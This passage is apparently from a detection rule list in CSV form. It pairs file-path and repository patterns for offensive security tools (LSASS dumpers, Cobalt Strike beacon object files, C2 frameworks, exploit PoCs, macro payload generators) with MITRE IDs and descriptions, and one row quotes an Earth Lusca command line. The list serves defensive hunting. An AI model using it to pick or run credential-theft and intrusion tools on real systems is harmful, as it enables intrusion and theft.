tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*/looneypwner.sh*",".{0,1000}\/looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*/loot_default/*.exe*",".{0,1000}\/loot_default\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_default/*.ps1*",".{0,1000}\/loot_default\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_default/*.py*",".{0,1000}\/loot_default\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/loot_finder*",".{0,1000}\/loot_finder.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/lpBunny/bof-registry*",".{0,1000}\/lpBunny\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/lsa_dump_*.txt*",".{0,1000}\/lsa_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/lsarelayx.git*",".{0,1000}\/lsarelayx\.git.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*/lsass.DMP*",".{0,1000}\/lsass\.DMP.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/lsass.rar*",".{0,1000}\/lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/lsass.zip*",".{0,1000}\/lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/lsass/beacon.h*",".{0,1000}\/lsass\/beacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Lsass_Shtinkering.cpp*",".{0,1000}\/Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/Lsass_Shtinkering.exe*",".{0,1000}\/Lsass_Shtinkering\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/LSASSProtectionBypass/CredGuard.c*",".{0,1000}\/LSASSProtectionBypass\/CredGuard\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/Lsass-Shtinkering.git*",".{0,1000}\/Lsass\-Shtinkering\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*/LsassSilentProcessExit.git*",".{0,1000}\/LsassSilentProcessExit\.git.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*/lsassy*",".{0,1000}\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/lsassy_dump.py*",".{0,1000}\/lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/lucksec/CVE-2022-0847*",".{0,1000}\/lucksec\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z" "*/lu-enum.nse*",".{0,1000}\/lu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/luijait/arpspoofing*",".{0,1000}\/luijait\/arpspoofing.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*/ly4k/Pachine*",".{0,1000}\/ly4k\/Pachine.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*/lyncsmash/*",".{0,1000}\/lyncsmash\/.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*",".{0,1000}\/m\s.{0,1000}\.lnk.{0,1000}\s\/c\s.{0,1000}cmd\s\/c\secho\sf\|xcopy\s\@file\s\%temp\%.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/m3-gen.py *",".{0,1000}\/m3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*/m4ll0k/*",".{0,1000}\/m4ll0k\/.{0,1000}","offensive_tool_keyword","Github Username","github username 'hacker' hosting exploitaitont tools and passwords attacks tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/m4ll0k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/m8r0wn/*",".{0,1000}\/m8r0wn\/.{0,1000}","offensive_tool_keyword","Github Username","pentester github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/m8r0wn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/MAAD-AF.git*",".{0,1000}\/MAAD\-AF\.git.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*/MaccaroniC2*",".{0,1000}\/MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*/MacroMeter*",".{0,1000}\/MacroMeter.{0,1000}","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","63","24","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z" "*/MacroPatterns.cs*",".{0,1000}\/MacroPatterns\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/Macro-Payloads.py*",".{0,1000}\/Macro\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/MacroWord_Payload/macro.txt*",".{0,1000}\/MacroWord_Payload\/macro\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/magnitude.profile*",".{0,1000}\/magnitude\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/MailSniper/*",".{0,1000}\/MailSniper\/.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*/main/cve-2022-0847.c*",".{0,1000}\/main\/cve\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/main/exploit.js",".{0,1000}\/main\/exploit\.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*/main/exploit.pdf",".{0,1000}\/main\/exploit\.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*/Maitm/Bells.py*",".{0,1000}\/Maitm\/Bells\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/MakeMeEnterpriseAdmin.ps1*",".{0,1000}\/MakeMeEnterpriseAdmin\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/malDll.dll*",".{0,1000}\/malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/MaliciousMacroMSBuild*",".{0,1000}\/MaliciousMacroMSBuild.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*/malleable-c2*",".{0,1000}\/malleable\-c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*/MalSCCM.git*",".{0,1000}\/MalSCCM\.git.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/MalSCCM.sln*",".{0,1000}\/MalSCCM\.sln.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/malseclogon.*",".{0,1000}\/malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/MalStuff.cpp*",".{0,1000}\/MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/man_in_the_browser/*.js*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The 